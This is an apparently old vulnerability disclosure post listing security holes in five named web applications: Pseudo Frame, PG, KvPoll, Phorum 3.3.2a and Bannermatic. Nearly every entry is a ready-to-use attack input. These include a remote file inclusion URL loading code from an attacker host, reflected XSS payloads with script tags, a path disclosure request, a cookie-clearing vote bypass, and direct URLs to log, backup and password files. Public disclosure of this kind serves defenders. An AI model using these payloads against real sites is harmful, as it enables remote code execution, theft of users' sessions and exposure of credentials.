Security holes : Pseudo-Frame, PG, KvPoll, Phorum, BanMat

[frog frog <leseulfrog () hotmail com>]

Product 1 :
***********
Pseudo Frame 1.0
http://www.clicky-web.net

Problem :
- Including file

Exploit :
- http://www.site.com/index.php?
page=http://www.haxor.com/file with file.php on 
http://www.haxor.com .

Product 2 :
***********
PG 1.0
http://www.clicky-web.net

Problems :
- XSS
- Path Disclosure

Exploits :
- index.php?picture_n="%
20width=0>&lt;script&gt;SCRIPT&lt;/script&gt;<img%20width=0%
20src="&gallery_name=path
- index.php?picture_n=image.gif&gallery_name=non-existant-
path 

Product 3 :
***********
KvPoll 1.1
http://www.killervault.com

Problem :
- Skirting of safety against multiple vote

Exploit :
- /clear_cookies.php

Product 4 :
***********
Phorum 3.3.2a RC1 
http://phorum.org

Problem :
- XSS

Exploits :
- /read.php?f=1&i=1&t=1"><form%20name=o><input%20name=u%
20value=XSS></form>&lt;script&gt;alert(document.o.u.value)
&lt;/script&gt;
- ">&lt;script&gt;SCRIPT&lt;/script&gt; in a message in the "email" 
input

Product 5 :
***********
BANNERMATIC V1, V2, V3
http://www.getcruising.com

Problem :
- Informations recovering

Exploits :
- /ban.log
- /ban.bak
- /ban.dat
- /banmat.pwd


frog-m@n